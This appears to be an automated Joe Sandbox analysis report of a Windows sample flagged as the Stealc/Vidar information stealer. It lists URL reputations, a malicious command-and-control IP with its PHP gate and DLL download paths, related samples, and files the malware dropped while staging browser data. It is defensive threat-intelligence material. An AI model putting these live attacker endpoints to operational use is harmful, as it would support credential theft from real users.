http://185.215.113.37e2b1563c6670f193.phpfox	0%	Avira URL Cloud	safe
https://mozilla.org0/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	0%	URL Reputation	safe
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	URL Reputation	safe
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/softokn3.dllE	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpog	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php~	100%	Avira URL Cloud	malware
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	URL Reputation	safe
http://185.215.113.37/	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpick	100%	Avira URL Cloud	malware
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/nss3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php_U	100%	Avira URL Cloud	malware
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	0%	URL Reputation	safe
http://185.215.113.37	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/mozglue.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php=r	100%	Avira URL Cloud	malware
https://support.mozilla.org	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://185.215.113.37/0d60be0de163924d/msvcp140.dll)	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpCO	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpCoinomi	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/softokn3.dll	100%	Avira URL Cloud	malware
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.phpBs	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/z	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phps	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/freebl3.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/sqlite3.dllJ	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpser	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phption:	100%	Avira URL Cloud	malware
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.php_	100%	Avira URL Cloud	malware
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	0%	Avira URL Cloud	safe
http://185.215.113.37/e2b1563c6670f193.php	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpi	100%	Avira URL Cloud	malware
http://185.215.113.37m	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dllP	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	100%	Avira URL Cloud	malware
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	0%	Avira URL Cloud	safe
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllW	100%	Avira URL Cloud	malware
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpH	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpin	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php5	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.phpFirefox	100%	Avira URL Cloud	malware
http://185.215.113.37/e2b1563c6670f193.php)	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.37/	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/nss3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/mozglue.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dll	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	KJKKKJJJ.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37e2b1563c6670f193.phpfox	file.exe, 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17WdsYWhtbmRlZHwxfDB8MHxab2hvIF	file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	KJKKKJJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpick	file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/softokn3.dllE	file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	file.exe, 00000000.00000002.1963426147.0000000029261000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, GDBFCGIIIJDBGCBGIDGI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php~	file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php_U	file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	KJKKKJJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php=r	file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37	file.exe, 00000000.00000002.1939228904.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpog	file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1792660617.000000001D230000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpCO	file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/msvcp140.dll)	file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpCoinomi	file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	GDBFCGIIIJDBGCBGIDGI.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpBs	file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phps	file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	KJKKKJJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/z	file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllJ	file.exe, 00000000.00000002.1939228904.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpser	file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phption:	file.exe, 00000000.00000002.1938047002.00000000002BB000.00000040.00000001.01000000.00000003.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.php_	file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	file.exe, 00000000.00000002.1963426147.0000000029261000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, GDBFCGIIIJDBGCBGIDGI.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpi	file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://www.sqlite.org/copyright.html.	file.exe, 00000000.00000002.1966394502.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1958385102.000000001D327000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37m	file.exe, 00000000.00000002.1939228904.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://www.mozilla.com/en-US/blocklist/	file.exe, 00000000.00000002.1966811807.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr	false	Avira URL Cloud: safe	unknown
https://mozilla.org0/	freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK201621kbG1nY	file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	file.exe, 00000000.00000002.1963426147.0000000029261000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, GDBFCGIIIJDBGCBGIDGI.0.dr	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	KJKKKJJJ.0.dr	false	Avira URL Cloud: safe	unknown
http://185.215.113.37/0d60be0de163924d/sqlite3.dllP	file.exe, 00000000.00000002.1939228904.0000000000D43000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV	file.exe, 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	KJKKKJJJ.0.dr	false	URL Reputation: safe	unknown
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	file.exe, 00000000.00000002.1963426147.0000000029261000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, GDBFCGIIIJDBGCBGIDGI.0.dr	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	file.exe, file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1792660617.000000001D230000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1938047002.00000000000F1000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm	file.exe, 00000000.00000002.1938047002.000000000014A000.00000040.00000001.01000000.00000003.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.37/0d60be0de163924d/vcruntime140.dllW	file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.ecosia.org/newtab/	KJKKKJJJ.0.dr	false	URL Reputation: safe	unknown
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpH	file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://ac.ecosia.org/autocomplete?q=	KJKKKJJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.phpin	file.exe, 00000000.00000002.1939228904.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	file.exe, 00000000.00000002.1963426147.0000000029261000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1939228904.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, GDBFCGIIIJDBGCBGIDGI.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php5	file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://185.215.113.37/e2b1563c6670f193.phpFirefox	file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://support.mozilla.org	IJJJEBFHDBGIECBFCBKJKKJDHJ.0.dr	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	KJKKKJJJ.0.dr	false	URL Reputation: safe	unknown
http://185.215.113.37/e2b1563c6670f193.php)	file.exe, 00000000.00000002.1939228904.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.215.113.37	unknown	Portugal		206894	WHOLESALECONNECTIONSNL	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1519600
Start date and time:	2024-09-26 18:26:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/22@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 75 Number of non-executed functions: 50
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.215.113.37	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37/e2b1563c6670f193.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WHOLESALECONNECTIONSNL	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Phorpiex	Browse	185.215.113.66
	file.exe	Get hash	malicious	Amadey	Browse	185.215.113.16
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse	185.215.113.103
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	185.215.113.37

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\freebl3.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
C:\ProgramData\mozglue.dll	file.exe	Get hash	malicious	Amadey, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, Clipboard Hijacker, CryptOne, Cryptbot, LummaC Stealer, PureLog Stealer	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Vidar	Browse

Created / dropped Files

C:\ProgramData\CAFHDBGHJKFIDHJJJEBK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\CBAKEBGIIDAFIDHIIECF

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\GDBFCGIIIJDBGCBGIDGI

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\IIIJECAEGDHIDHJKKKKFIEGIJK

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJJJEBFH

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\IJJJEBFHDBGIECBFCBKJKKJDHJ

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
